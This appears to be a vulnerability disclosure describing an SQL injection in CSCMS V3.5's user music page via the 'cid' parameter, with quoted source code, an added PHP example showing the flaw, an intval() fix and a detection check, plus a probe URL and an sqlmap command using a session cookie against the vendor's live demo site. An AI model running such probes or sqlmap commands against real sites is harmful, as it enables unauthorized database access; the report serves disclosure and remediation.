### Brief description:
The latest CSCMS V3.5 contains an SQL injection vulnerability, confirmed on the official demo site http://demo.chshcms.com/. The code analysis is in the Detailed description section; the live demonstration is in the Proof of vulnerability section.
### Detailed description:
/app/controllers/user/music.php line 16
```php
public function index() // User member centre - Music - My shares - Chinese dance tracks
{
    $data = '';
    // The following lines use xss_clean, which does not filter SQL injection characters, especially single quotes
    $yid  = $this->security->xss_clean($this->input->get('yid', TRUE));  // yid: 1 = shared, 2 = pending review, 3 = recycle bin
    $cid  = $this->security->xss_clean($this->input->get('cid', TRUE));  // cid
    $page = $this->security->xss_clean($this->input->get('page', TRUE)); // page
    // ………………………………… several lines omitted ………………………………
    if (!empty($page_arr) && !empty($page_arr[2])) {
        // The following statement is fine
        $sqlstr = "select * from " . CS_SqlPrefix . "dance where CS_User='" . $this->session->userdata('cs_name') . "'"; // still fine here
        if ($yid == 3) { // direct comparison, safe
            $sqlstr .= " and cs_hid=1"; // safe
        } else {
            $sqlstr .= " and cs_hid=0"; // safe
        }
        if ($yid == 1 || $yid == 2) { // safe
            $yid = $yid - 1; // safe
            $sqlstr .= " and cs_yid='$yid'"; // safe
        }
        if ($cid) { // cid comes straight from xss_clean
            $sqlstr .= " and cs_cid='$cid'";
            // Wrapping it in single quotes does not help: there is no intval(), only xss_clean, so this is a string-type injection
        }
        // …………………… remainder omitted ……………………
```
Therefore the injection point is http://demo.chshcms.com/index.php/user/music?cid=1
Type: string (because the value is wrapped in single quotes)
Note: a registered, logged-in user is required
```
http://demo.chshcms.com/index.php/user/music?cid=1'
```
[![4.PNG](https://images.seebug.org/upload/201312/30004113e46ed2be197ff82c2fa36b3a55e20400.png)](https://images.seebug.org/upload/201312/30004113e46ed2be197ff82c2fa36b3a55e20400.png)
### Proof of vulnerability:
The test below is run against the official demo site (the single quote above already proves the problem, but to show the impact it is worth proving that the whole database can be enumerated).
Register a user, log in, and run SQLMAP with that user's cookie:
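To make the root cause concrete, here is an added example (not code from the CSCMS project) that rebuilds the `cs_cid` filter from `user/music.php` in a stand-alone script: the vulnerable interpolation beside the `intval()` fix the report asks for, plus a small check a defender can run over logged `cid` values. `CS_SqlPrefix`, the `demo` user and the `xss_clean_stub` are assumptions standing in for the real CodeIgniter pieces.

```php
<?php
// Added example, not part of CSCMS. CS_SqlPrefix value is a placeholder.
define('CS_SqlPrefix', 'cscms_');

// Stand-in for CodeIgniter's xss_clean(): it strips HTML-style constructs
// but, as the report points out, leaves SQL metacharacters such as ' alone.
// Simplified for this demo; the real filter is far more involved.
function xss_clean_stub($value) {
    return preg_replace('/<[^>]*>/', '', $value);
}

// Vulnerable form: the xss_clean'd value is interpolated inside quotes,
// so a single quote in $cid closes the literal and the rest becomes SQL.
function build_filter_vulnerable($cid) {
    $cid = xss_clean_stub($cid);
    $sql = "select * from " . CS_SqlPrefix . "dance where CS_User='demo'";
    if ($cid) {
        $sql .= " and cs_cid='$cid'";
    }
    return $sql;
}

// Hardened form: cs_cid is an integer id, so cast it before use.
// intval("1'") === 1, so the quote never reaches the query string.
// Inside CodeIgniter the same idea with query bindings would be
// $this->db->query("... and cs_cid=?", array((int)$cid)).
function build_filter_hardened($cid) {
    $cid = intval($cid);
    $sql = "select * from " . CS_SqlPrefix . "dance where CS_User='demo'";
    if ($cid > 0) {
        $sql .= " and cs_cid=" . $cid;
    }
    return $sql;
}

// Detection helper: an integer id parameter should never carry anything
// but digits; flag any logged cid value that does.
function cid_looks_malformed($cid) {
    $cid = (string) $cid;
    return $cid !== '' && !ctype_digit($cid);
}

$probe = "1'"; // the same probe the report uses against the demo site
echo build_filter_vulnerable($probe), "\n"; // broken literal: cs_cid='1''
echo build_filter_hardened($probe), "\n";   // safe: cs_cid=1
var_dump(cid_looks_malformed($probe));      // flagged for review
```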
```
C:\Users\Administrator>sqlmap.py -u "http://demo.chshcms.com/index.php/user/music?cid=1" -p cid --dbms=mysql --cookie="cscms_cscms_session=Da%2BbjXSsVeKp%2FhhWorAah04ukW0CmpqdQWFEt%2FZYB%2BPTQq86NpxXi67qadig2AgchmmiQpS1AYsnWeW7J%2FKSfWqLXbkSoYARVkBhHcaRE%2FVhGwqf92O0%2F9W%2FoLWnx4G35qINDgqkyTe0g0LP5B6B48une0%2Bnk7Jde23X9wUTeUb%2Bws5kMlBies8kU1bITcGuHc%2BwGVbb3kYulG2wne3IboEVVd98PIasyT1rssVBpuaxttqKnbjJYIAnNiv3Zs4gCtI20iogyxhA2iiNZHID4KJLgjqrRPfLa%2F1tZgh6R8AWYMmKvfqtaLAcxlKbWplXt%2F4P03WDFnkc0rhN3067Yxsm35kgL4RMsOxjwsBMCtRK1cz7xe6r8oHzA4nMb%2FDVSqHlY5IIIS6WyzgFsRySjhWzwmg8Dj7%2F1D%2B2NjsHWglCy5CjsE%2B0JyKOvIZD1m1t8roTzo32o2rvnM69KKJI6Osn1d95HkuSuike5XxHyoIu%2FiGh3BniKm4mLnesq1yi" --tables
```
[![00001.PNG](https://images.seebug.org/upload/201312/3000464555cfa730752645578c60da9010f4becf.png)](https://images.seebug.org/upload/201312/3000464555cfa730752645578c60da9010f4becf.png)
[![00002.PNG](https://images.seebug.org/upload/201312/30004654e84e6dca05b5a04def2f87aba26d92af.png)](https://images.seebug.org/upload/201312/30004654e84e6dca05b5a04def2f87aba26d92af.png)
[![00003.PNG](https://images.seebug.org/upload/201312/3000470643845ca9b685e5673cfb6fb7eaadf482.png)](https://images.seebug.org/upload/201312/3000470643845ca9b685e5673cfb6fb7eaadf482.png)